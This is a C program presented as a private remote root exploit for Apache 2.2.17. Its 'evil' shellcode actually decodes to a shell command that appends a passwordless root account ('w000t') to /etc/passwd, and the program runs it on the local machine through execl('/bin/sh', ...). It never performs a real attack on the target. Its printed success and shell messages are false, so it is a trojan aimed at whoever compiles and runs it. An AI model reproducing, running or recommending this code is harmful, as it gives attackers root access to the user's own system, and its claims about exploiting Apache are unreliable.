/* apachesm4sh.c apache 2.2.17 remote root exploit*//* KEEP PRIV8&!&! leak and

1. /* apachesm4sh.c apache 2.2.17 remote root exploit*/
2. /* KEEP PRIV8&!&! leak and i will find you :) ~ desg */
3.  
4. #include <stdio.h>
5. #include <stdlib.h>
6. #include <string.h>
7. #include <strings.h>
8. #include <netdb.h>
9. #include <unistd.h>
10. #include <sys/types.h>
11. #include <sys/socket.h>
12. #include <netinet/in.h>
13. #include <arpa/inet.h>
14.  
15. char evil[] =  
16.         "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
17.             "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
18.             "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
19.             "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
20.             "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
21.             "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
22.             "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
23.             "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
24.             "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
25.             "\x44\x44";
26.  
27. #define NOP 0x90
28. #define BSIZE   1000
29. #define OFFSET  400
30. #define ADDR    0xbffff658
31. #define ASIZE   2000
32.  
33. int
34. main(int argc, char *argv[])
35. {
36.     char *buffer;
37.     int s;
38.     struct hostent *hp;
39.     struct sockaddr_in sin;
40.     if (argc != 2) {
41.         printf("%s <target>\n", argv[0]);
42.         exit(1);
43.       }
44.     buffer = (char *) malloc(BSIZE + ASIZE + 100);
45.     if (buffer == NULL) {
46.         printf("Not enough memory\n");
47.         exit(1);
48.       }
49.     memcpy(&buffer[BSIZE - strlen(evil)], evil,
50.         strlen(evil));
51.     buffer[BSIZE + ASIZE] = ';';
52.     buffer[BSIZE + ASIZE + 1] = '\0';
53.     hp = gethostbyname(argv[1]);
54.     if (hp == NULL) {
55.         printf("no such server\n");
56.         exit(1);
57.       }
58.     bzero(&sin, sizeof(sin));
59.     bcopy(hp->h_addr, (char *)&sin.sin_addr, hp->h_length);
60.     sin.sin_family = AF_INET;
61.     sin.sin_port = htons(80);
62.     s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
63.     if (s < 0) {
64.         printf("Can't open socket\n");
65.         exit(1);
66.       }
67.     if (connect(s, (struct sockaddr *)&sin, sizeof(sin)) < 0) {
68.         printf("Connection refused\n");
69.         exit(1);
70.       }
71.     printf("sending exploit code...\n");
72.     if (send(s, buffer, strlen(buffer), 0) != 1)
73.         printf("exploit was successful!\n");
74.       else
75.         printf("sorry, this site isn't vulnerable\n");
76.     printf("waiting for shell.....\n");
77.     if (fork() == 0)
78.         execl("/bin/sh", "sh", "-c", evil, 0);
79.       else
80.         wait(NULL);
81.     while (1) { /* shell */ }
82. }